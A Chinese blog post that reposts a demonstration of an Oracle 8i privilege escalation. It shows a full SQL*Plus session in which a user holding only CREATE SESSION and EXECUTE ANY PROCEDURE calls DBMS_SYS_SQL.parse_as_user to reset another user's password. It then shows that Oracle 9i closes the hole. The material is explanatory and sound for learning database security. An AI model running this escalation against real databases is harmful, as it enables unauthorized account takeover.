ITPub博客

首页 > Linux操作系统 > Linux操作系统 > 有了 "CREATE SESSION" and "EXECUTE ANY PROCEDURE"

有了 "CREATE SESSION" and "EXECUTE ANY PROCEDURE"

原创 Linux操作系统 作者:lucy_lxy 时间:2011-08-17 14:30:33 0 删除 编辑
今天察看7445的错发现一贴子,记录如下:
 
http://www.eygle.com/archives/2005/05/why_execute_any.html
 
TOM曾经多次说过:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and 
I can totally do anything I want to in your database.
那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?
让我们通过一个例子来认识这个危险.
1.创建测试用户
$ sqlplus "/ as sysdba"

SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005

(c) Copyright 2000 Oracle Corporation.  All rights reserved.


Connected to:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production
With the Partitioning option
JServer Release 8.1.7.4.0 - 64bit Production

SQL> create user hacker identified by hacker default tablespace users temporary  
  2  tablespace temp;

User created.

SQL> grant create session to hacker;

Grant succeeded.

SQL> grant execute any procedure to hacker;

Grant succeeded.

SQL> create user loser identified by loser default tablespace users temporary
  2  tablespace temp;

User created.

SQL> grant connect to loser;

Grant succeeded.


2.使用测试用户连接
注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。
SQL> connect hacker/hacker
Connected.
SQL> desc sys.dbms_sys_sql
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 N_TAB                          TABLE OF NUMBER         IN
PROCEDURE BIND_ARRAY
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 C_TAB                          TABLE OF VARCHAR2(2000) IN
....
PROCEDURE VARIABLE_VALUE_ROWID
 Argument Name                  Type                    In/Out Default?
 ------------------------------ ----------------------- ------ --------
 C                              NUMBER(38)              IN
 NAME                           VARCHAR2                IN
 VALUE                          ROWID                   OUT


3.这意味着什么?
SQL> connect hacker/hacker
Connected.

SQL> DECLARE
  2     UID       NUMBER;
  3     sqltext   VARCHAR2 (100) := 'alter user loser identified by test';
  4     c         INTEGER;
  5  BEGIN
  6     c := SYS.DBMS_SYS_SQL.open_cursor ();
  7     SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0);
  8     SYS.DBMS_SYS_SQL.close_cursor (c);
  9      END;
 10  /
  
PL/SQL procedure successfully completed.

通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。
用户loser的口令已被更改:
SQL> connect loser/loser
ERROR:
ORA-01017: invalid username/password; logon denied


Warning: You are no longer connected to ORACLE.
SQL> connect loser/test
Connected.

SQL> 

4.注意版本
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
SQL> grant execute any procedure to test;

Grant succeeded.

Elapsed: 00:00:00.33
SQL> connect test/test
Connected.
SQL> desc dbms_sys_sql
ERROR:
ORA-04043: object dbms_sys_sql does not exist


SQL> desc sys.dbms_sys_sql
ERROR:
ORA-04043: object sys.dbms_sys_sql does not exist


SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
PL/SQL Release 9.2.0.4.0 - Production
CORE    9.2.0.3.0       Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production

Elapsed: 00:00:00.32

Oracle的世界也正在变得更加安全。
 
 
其中心意思是有了两种权限,就能访问和执行dbms_sys_sql包的权限。所幸的是9i之后这个漏洞就没了,学无止境!

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/7177735/viewspace-705118/,如需转载,请注明出处,否则将追究法律责任。

上一篇: 玉面飞龙
请登录后发表评论 登录
全部评论

注册时间:2010-09-27

  • 博文量
    124
  • 访问量
    351963